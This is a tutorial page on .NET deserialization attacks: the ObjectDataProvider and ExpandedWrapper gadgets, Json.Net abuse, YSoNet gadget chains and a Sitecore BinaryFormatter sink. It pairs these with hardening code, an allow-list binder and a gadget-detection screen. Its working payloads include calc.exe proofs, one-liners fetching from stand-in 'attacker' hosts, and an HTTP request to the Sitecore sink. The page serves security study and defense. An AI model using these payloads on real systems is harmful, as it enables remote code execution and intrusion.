Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
This post is dedicated to understanding how the ObjectDataProvider gadget is exploited to obtain RCE and how the serialization libraries Json.Net and XmlSerializer can be abused with that gadget.
ObjectDataProvider Gadget
From the documentation: the ObjectDataProvider class wraps and creates an object that you can use as a binding source.
Yes, it's a weird explanation, so let's see what this class has that is so interesting: this class allows wrapping an arbitrary object, using MethodParameters to set arbitrary parameters, and then using MethodName to call an arbitrary function of the wrapped object with those parameters.
Therefore, the wrapped object will execute a function with attacker-controlled parameters while being deserialized.
How is this possible
The System.Windows.Data namespace, found within PresentationFramework.dll at C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF, is where the ObjectDataProvider is defined and implemented.
Using dnSpy you can inspect the code of the class we are interested in. In the image below we are seeing the code of PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name
As you can see, when MethodName is set, base.Refresh() is called; let's take a look at what it does:
Ok, let's continue and see what this.BeginQuery() does. BeginQuery is overridden by ObjectDataProvider and this is what it does:
Note that at the end of the code it calls this.QueryWorker(null). Let's see what is executed when it is called:
Note that this isn't the complete code of the QueryWorker function, but it shows the interesting part: the code calls this.InvokeMethodOnInstance(out ex); this is the line where the configured method is invoked.
If you want to check that just setting the MethodName it will be executed, you can run this code:
```csharp
using System.Windows.Data;
using System.Diagnostics;

namespace ODPCustomSerialExample
{
    class Program
    {
        static void Main(string[] args)
        {
            ObjectDataProvider myODP = new ObjectDataProvider();
            // Type whose method will be invoked
            myODP.ObjectType = typeof(Process);
            // Arguments handed to that method
            myODP.MethodParameters.Add("cmd.exe");
            myODP.MethodParameters.Add("/c calc.exe");
            // Setting MethodName triggers Refresh() -> BeginQuery() -> QueryWorker() -> InvokeMethodOnInstance()
            myODP.MethodName = "Start";
        }
    }
}
```
Note that you need to add C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll as a reference in order to load System.Windows.Data.
ExpandedWrapper
Using the previous exploit, there will be cases where the object is going to be deserialized as an ObjectDataProvider instance (for example in the DotNetNuke vuln, using XmlSerializer, the object was deserialized using GetType). Then, the deserializer will have no knowledge of the object type that is wrapped inside the ObjectDataProvider instance (Process, for example). You can find more information about the DotNetNuke vuln here.
This class allows specifying the object types of the objects that are encapsulated in a given instance. So, this class can be used to encapsulate a source object (ObjectDataProvider) into a new object type and provide the properties we need (ObjectDataProvider.MethodName and ObjectDataProvider.MethodParameters).
This is very useful for cases like the one presented before, because we will be able to wrap ObjectDataProvider inside an ExpandedWrapper instance, and when deserialized this class will create the ObjectDataProvider object that will execute the function indicated in MethodName.
You can check this wrapper with the following code:
```csharp
using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;

namespace ODPCustomSerialExample
{
    class Program
    {
        static void Main(string[] args)
        {
            // ExpandedWrapper carries the concrete type (Process) that the bare ObjectDataProvider would lose
            ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
            myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
            myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
            myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
            myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
            myExpWrap.ProjectedProperty0.MethodName = "Start";
        }
    }
}
```
Json.Net
The official web page states that this library allows you to serialize and deserialize any .NET object with Json.NET's powerful JSON serializer. So, if we can deserialize the ObjectDataProvider gadget, we can cause RCE just by deserializing an object.
Json.Net example
First of all, let's see an example of how to serialize/deserialize an object using this library:
```csharp
using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;

namespace DeserializationTests
{
    public class Account
    {
        public string Email { get; set; }
        public bool Active { get; set; }
        public DateTime CreatedDate { get; set; }
        public IList<string> Roles { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            Account account = new Account
            {
                Email = "james@example.com",
                Active = true,
                CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
                Roles = new List<string>
                {
                    "User",
                    "Admin"
                }
            };

            // Serialize the object and print it
            string json = JsonConvert.SerializeObject(account);
            Console.WriteLine(json);
            // {"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}

            // Deserialize it back into a strongly typed Account
            Account desaccount = JsonConvert.DeserializeObject<Account>(json);
            Console.WriteLine(desaccount.Email);
        }
    }
}
```
Abusing Json.Net
Using ysoserial.net I created the exploit:
```bash
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
```
```json
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd', '/c calc.exe']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```
With this code you can test the exploit: just run it and you will see that calc is launched. Note that the only thing that makes the `$type` directive effective is the `TypeNameHandling.Auto` setting; with the default `TypeNameHandling.None` the type name is ignored.
```csharp
using System;
using System.Text;
using Newtonsoft.Json;

namespace DeserializationTests
{
    class Program
    {
        static void Main(string[] args)
        {
            // Declare exploit (the ysoserial.net ObjectDataProvider / Json.Net output)
            string userdata = @"{
                '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
                'MethodName':'Start',
                'MethodParameters':{
                    '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
                    '$values':['cmd', '/c calc.exe']
                },
                'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
            }";

            // Exploit to base64 (simulates how the data would travel, e.g. in a cookie or form field)
            string userdata_b64 = Convert.ToBase64String(Encoding.UTF8.GetBytes(userdata));

            // Get data back from base64
            byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
            string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);

            // Deserialize data: TypeNameHandling.Auto honours the '$type' directives, so the
            // ObjectDataProvider is instantiated and MethodName is invoked during deserialization
            object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
            {
                TypeNameHandling = TypeNameHandling.Auto
            });
        }
    }
}
```
Advanced .NET Gadget Chains (YSoNet & ysoserial.net)
The ObjectDataProvider + ExpandedWrapper technique shown above is just one of MANY gadget chains that can be abused when an application performs unsafe .NET deserialization. Modern red-team tooling such as YSoNet (and the older ysoserial.net) automates the creation of ready-to-use malicious object graphs for dozens of gadgets and serialization formats.
Below is a condensed reference of the most useful chains shipped with YSoNet, together with a short explanation of how they work and example commands to generate the payloads.
| Gadget Chain | Key Idea / Primitive | Typical Serializers | YSoNet one-liner |
|---|---|---|---|
| TypeConfuseDelegate | Corrupts the DelegateSerializationHolder record so that, once materialised, the delegate points to any attacker-supplied method (e.g. Process.Start) | BinaryFormatter, SoapFormatter, NetDataContractSerializer | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
| ActivitySurrogateSelector | Abuses System.Workflow.ComponentModel.ActivitySurrogateSelector to bypass the type-filtering of .NET ≥4.8 and directly invoke the constructor of a supplied class or compile a C# file on the fly | BinaryFormatter, NetDataContractSerializer, LosFormatter | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
| DataSetOldBehaviour | Leverages the legacy XML representation of System.Data.DataSet to instantiate arbitrary types by filling the `<ColumnMapping>` / `<DataType>` fields (optionally spoofing the assembly with --spoofedAssembly) | LosFormatter, BinaryFormatter, XmlSerializer | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
| GetterCompilerResults | On WPF-enabled runtimes (> .NET 5) chains property getters until it reaches System.CodeDom.Compiler.CompilerResults, then compiles or loads the DLL supplied with -c | Json.NET typeless, MessagePack typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
| ObjectDataProvider (review) | Uses WPF System.Windows.Data.ObjectDataProvider to call an arbitrary static method with controlled arguments. YSoNet adds a --xamlurl option to host the malicious XAML remotely | BinaryFormatter, Json.NET, XAML, etc. | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
| PSObject (CVE-2017-8565) | Embeds a ScriptBlock inside System.Management.Automation.PSObject that is executed when PowerShell deserialises the object | PowerShell remoting, BinaryFormatter | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
tip
All payloads are written to stdout by default, which makes it trivial to pipe them into other tools (e.g. ViewState generators, base64 encoders, HTTP clients).
Building / Installing YSoNet
If no pre-built binaries are available under Actions → Artifacts / Releases, the following PowerShell one-liner sets up the build environment, clones the repository and compiles everything in Release mode:
```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'));
choco install visualstudio2022community visualstudio2022-workload-nativedesktop msbuild.communitytasks nuget.commandline git --yes;
git clone https://github.com/irsdl/ysonet
cd ysonet
nuget restore ysonet.sln
msbuild ysonet.sln -p:Configuration=Release
```
The compiled ysonet.exe can then be found under ysonet/bin/Release/.
Detection & Hardening
- Detect unexpected child processes of w3wp.exe, PowerShell.exe, or any process deserialising user-supplied data (e.g. MessagePack, Json.NET).
- Enable and enforce type-filtering (TypeFilterLevel = Full, a custom SurrogateSelector, a SerializationBinder, etc.) wherever the legacy BinaryFormatter / NetDataContractSerializer cannot be removed.
- Where possible, migrate to System.Text.Json or DataContractJsonSerializer with allow-list based converters.
- Prevent dangerous WPF assemblies (PresentationFramework, System.Workflow.*) from being loaded in web processes that should never need them.
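The SerializationBinder recommendation above, and the Json.Net abuse earlier on this page (where `TypeNameHandling.Auto` is what lets a `$type` directive select ObjectDataProvider), can be shown side by side in C#. The following is an added example, not code from the original page, from Json.NET or from YSoNet: the `Message` DTOs, `AllowListBinder` and the `DeserializationHardening` namespace are assumptions for illustration, and the sample payload is constructed (it is the `$type` shape of the gadget JSON above with no command arguments). It shows that Json.NET's default `TypeNameHandling.None` never resolves `$type`, and that when polymorphic deserialization is genuinely needed, an `ISerializationBinder` allow-list fails closed before any instance is created.

```csharp
using System;
using System.Collections.Generic;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;

namespace DeserializationHardening
{
    // Hypothetical application DTOs: the only polymorphic types this endpoint legitimately accepts.
    public abstract class Message { public string Id { get; set; } }
    public class TextMessage : Message { public string Body { get; set; } }
    public class PingMessage : Message { }

    // Allow-list binder: a "$type" that is not explicitly registered is rejected before
    // Json.NET constructs an instance, so gadget types such as ObjectDataProvider never load.
    public sealed class AllowListBinder : ISerializationBinder
    {
        private readonly Dictionary<string, Type> _allowed = new Dictionary<string, Type>(StringComparer.Ordinal);

        public AllowListBinder(params Type[] allowed)
        {
            foreach (var t in allowed) _allowed[t.FullName] = t;
        }

        public Type BindToType(string assemblyName, string typeName)
        {
            if (_allowed.TryGetValue(typeName, out var t)) return t;
            // Fail closed: throwing here aborts the whole deserialization.
            throw new JsonSerializationException($"Type '{typeName}' is not on the deserialization allow-list.");
        }

        public void BindToName(Type serializedType, out string assemblyName, out string typeName)
        {
            // Emit only the full type name; the consuming side maps it back through the allow-list.
            assemblyName = null;
            typeName = serializedType.FullName;
        }
    }

    class Program
    {
        // Constructed sample: the "$type" directive of the ObjectDataProvider payload shown on this page,
        // without MethodParameters/ObjectInstance, which are not needed to demonstrate rejection.
        const string GadgetPayload = @"{
            '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
            'MethodName':'Start'
        }";

        // Constructed sample: a legitimate polymorphic message.
        const string LegitPayload = @"{
            '$type':'DeserializationHardening.TextMessage',
            'Id':'42',
            'Body':'hello'
        }";

        static readonly JsonSerializerSettings Hardened = new JsonSerializerSettings
        {
            // Polymorphism is required for Message subclasses, but only through the allow-list.
            TypeNameHandling = TypeNameHandling.Objects,
            SerializationBinder = new AllowListBinder(typeof(TextMessage), typeof(PingMessage))
        };

        static void Main(string[] args)
        {
            // 1) Default settings (TypeNameHandling.None): "$type" is an ordinary property and no
            //    type is ever resolved from the document, so the result is a plain JObject.
            var untyped = JsonConvert.DeserializeObject<object>(GadgetPayload);
            Console.WriteLine("Default settings produced: " + untyped.GetType().Name);

            // 2) Hardened polymorphic settings: the legitimate payload binds to TextMessage...
            var msg = JsonConvert.DeserializeObject<Message>(LegitPayload, Hardened);
            Console.WriteLine("Accepted: " + msg.GetType().Name + " body=" + ((TextMessage)msg).Body);

            // 3) ...while the gadget "$type" is refused by the binder before instantiation.
            try
            {
                JsonConvert.DeserializeObject<Message>(GadgetPayload, Hardened);
                Console.WriteLine("UNEXPECTED: gadget payload was accepted");
            }
            catch (JsonSerializationException ex)
            {
                Console.WriteLine("Rejected: " + ex.Message);
            }
        }
    }
}
```

`ISerializationBinder` and `JsonSerializerSettings.SerializationBinder` exist from Json.NET 10 onwards. Keying the allow-list by `Type.FullName` and ignoring the assembly part means a payload cannot smuggle a different assembly for an accepted type name, and anything else (including `System.Collections.ArrayList` used for MethodParameters in the gadget JSON) is refused at `BindToType`.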
Real-world sink example: Sitecore convertToRuntimeHtml → BinaryFormatter
A practical .NET sink reachable in authenticated Sitecore XP Content Editor flows:
- Sink API: Sitecore.Convert.Base64ToObject(string) wraps new BinaryFormatter().Deserialize(...).
- Trigger path: the convertToRuntimeHtml pipeline → ConvertWebControls, which looks for a sibling element with id="{iframeId}_inner" and reads its value attribute, which is treated as base64-wrapped serialized data. The result is cast to string and injected into the HTML.
Minimal end-to-end (verified):
```http
// Load HTML into EditHtml session
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
Content-Type: application/x-www-form-urlencoded

__PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
<html>
<iframe id="test" src="poc"></iframe>
<dummy id="test_inner" value="BASE64_BINARYFORMATTER"></dummy>
</html>

// Server returns a handle; visiting FixHtml.aspx?hdl=... triggers deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
```
- Gadget: any BinaryFormatter chain that returns a string (side effects run during deserialization). See YSoNet/ysoserial.net to generate payloads.
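The sink above receives a base64 blob that goes straight into BinaryFormatter, so the defender-side question is what can be checked before the sink runs and what should raise an alert in logs. The following C# helper is an added example, not Sitecore's, YSoNet's or watchTowr's code; `BinaryFormatterScreen`, `Inspect` and the sample inputs are constructed for illustration. It verifies the fixed 17-byte SerializationHeaderRecord that every BinaryFormatter stream begins with and then searches for the gadget type names listed on this page, which appear in the stream as plain length-prefixed strings. It is a detection/blocking control, not a substitute for removing BinaryFormatter.

```csharp
using System;
using System.Linq;
using System.Text;

namespace SinkDetection
{
    // Hypothetical screening helper for a base64 parameter that is about to reach a
    // BinaryFormatter sink, such as the "value" attribute read by ConvertWebControls.
    // It does not make BinaryFormatter safe; it decides whether the input should be
    // blocked and logged before the sink ever executes.
    public static class BinaryFormatterScreen
    {
        public enum Verdict { NotBinaryFormatter, NoKnownGadget, KnownGadget }

        // Every BinaryFormatter stream starts with a 17-byte SerializationHeaderRecord:
        // record type 0x00, RootId = 1, HeaderId = -1, MajorVersion = 1, MinorVersion = 0.
        // In base64 this is the well-known "AAEAAAD/////AQAAAAAAAAA" prefix worth alerting on.
        public static readonly byte[] Header =
        {
            0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
            0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
        };

        // Class and library names are written as length-prefixed UTF-8 strings, so the gadget
        // types discussed on this page are visible as plain substrings of the payload.
        public static readonly string[] GadgetMarkers =
        {
            "System.Windows.Data.ObjectDataProvider",
            "System.Data.Services.Internal.ExpandedWrapper",
            "System.DelegateSerializationHolder",
            "System.Workflow.ComponentModel.ActivitySurrogateSelector",
            "System.Data.DataSet",
            "System.CodeDom.Compiler.CompilerResults",
            "System.Management.Automation.PSObject",
        };

        public static Verdict Inspect(string base64, out string reason)
        {
            byte[] raw;
            try { raw = Convert.FromBase64String(base64); }
            catch (FormatException) { reason = "not valid base64"; return Verdict.NotBinaryFormatter; }

            if (raw.Length < Header.Length || !raw.Take(Header.Length).SequenceEqual(Header))
            {
                reason = "no BinaryFormatter header";
                return Verdict.NotBinaryFormatter;
            }

            // A lossy UTF-8 decode is enough: ASCII type names survive, binary noise becomes U+FFFD.
            string text = Encoding.UTF8.GetString(raw);
            foreach (string marker in GadgetMarkers)
            {
                if (text.IndexOf(marker, StringComparison.Ordinal) >= 0)
                {
                    reason = "BinaryFormatter stream references " + marker;
                    return Verdict.KnownGadget;
                }
            }

            reason = "BinaryFormatter stream without known gadget markers (still untrusted input)";
            return Verdict.NoKnownGadget;
        }
    }

    class Program
    {
        static void Main()
        {
            // Constructed samples; none of them is a working payload.
            // a) plain data that was never serialized
            string notSerialized = Convert.ToBase64String(Encoding.ASCII.GetBytes("<p>plain html</p>"));
            // b) header + BinaryObjectString record (type 0x06, ObjectId 1, length 5, "hello") + MessageEnd (0x0B)
            byte[] helloRecord = new byte[] { 0x06, 0x01, 0x00, 0x00, 0x00, 0x05 }
                .Concat(Encoding.ASCII.GetBytes("hello")).Concat(new byte[] { 0x0B }).ToArray();
            string benignStream = Convert.ToBase64String(BinaryFormatterScreen.Header.Concat(helloRecord).ToArray());
            // c) header followed by a gadget type name, as a ClassInfo record would carry it
            string gadgetLike = Convert.ToBase64String(
                BinaryFormatterScreen.Header.Concat(Encoding.ASCII.GetBytes("System.Windows.Data.ObjectDataProvider")).ToArray());

            foreach (var sample in new[] { notSerialized, benignStream, gadgetLike })
            {
                var verdict = BinaryFormatterScreen.Inspect(sample, out string reason);
                Console.WriteLine($"{verdict,-19} {reason}");
            }
        }
    }
}
```

The three constructed samples exercise each verdict in turn. In a web pipeline this check belongs in front of the sink (or in a request filter / WAF rule on the base64 prefix), with `KnownGadget` blocked and logged together with the requesting account, since the Sitecore path above is only reachable authenticated.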
For the full chain that starts pre-auth via HTML cache poisoning in Sitecore and pivots to this sink:
References
- YSoNet: .NET Deserialization Payload Generator
- ysoserial.net: original PoC tool
- Microsoft: CVE-2017-8565
- watchTowr Labs: Sitecore XP cache poisoning to RCE